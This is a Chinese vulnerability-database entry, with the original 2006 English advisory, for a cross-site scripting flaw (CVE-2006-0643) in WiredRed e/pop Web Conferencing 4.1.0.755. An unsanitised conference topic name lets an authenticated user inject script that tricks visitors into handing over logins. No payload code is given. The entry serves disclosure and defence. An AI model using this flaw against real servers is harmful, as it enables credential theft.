WiredRed E/POP Web Conferencing 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196107 漏洞类型 跨站脚本
发布时间 2006-02-08 更新时间 2007-03-01
CVE编号 CVE-2006-0643 CNNVD-ID CNNVD-200602-137
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/16542
https://cxsecurity.com/issue/WLB-2006020030
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-137
|漏洞详情
WiredRede/popWebConferencing4.1.0.755中存在跨站脚本攻击(XSS)漏洞。远程认证用户可以借助会议的议题名称注入任意Web脚本或HTML。
|漏洞EXP
WiredRed EPOP XSS Vulnerability

---Summary---

Software  Affected: EPOP  WebConference  Server
     Software Versions:  4.1.0.755
     Vendors URL:        www.wiredred.com
     Vulnerability Type: Cross Site Scripting
     Proof of Concept:   An exploit is not required
     Threat Level:       Low

---Product Description---

e/pop from WiredRed provides a complete solution for all of your      real-time communications requirements: web and desktop video conferencing, secure IM and alert messaging. As a user, you'll love the hassle free interface and breadth of options that will enhance your training, sales and collaboration.

---Vulnerability Description---

When creating public or private conferences in e/pop server, the topic name is not properly sanitized.  This allows for a xss attack in which every user who visits the root (login) page for the e/pop web server can be fooled into entering their login information on a remote server among other things.  By default, e/pop is enabled without or with optional SSL connections to the web server.  Any standard authenticated user can perform this attack on all other users or visitors of the web server.

---Solution---

None at this time.

---credit---

Adrian Castro

_____________________________________________________________
Thank you for choosing LinuxQuestions.
http://www.linuxquestions.org
|受影响的产品
WiredRed e/pop Web Conferencing 4.1 755
|参考资料

来源:BID
名称:16542
链接:http://www.securityfocus.com/bid/16542
来源:BUGTRAQ
名称:20060208WiredRedEPOPXSSVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/424419/100/0/threaded
来源:XF
名称:epop-topic-xss(24609)
链接:http://xforce.iss.net/xforce/xfdb/24609
来源:OSVDB
名称:22997
链接:http://www.osvdb.org/22997
来源:VUPEN
名称:ADV-2006-0505
链接:http://www.frsirt.com/english/advisories/2006/0505
来源:SREASON
名称:421
链接:http://securityreason.com/securityalert/421
来源:SECUNIA
名称:18753
链接:http://secunia.com/advisories/18753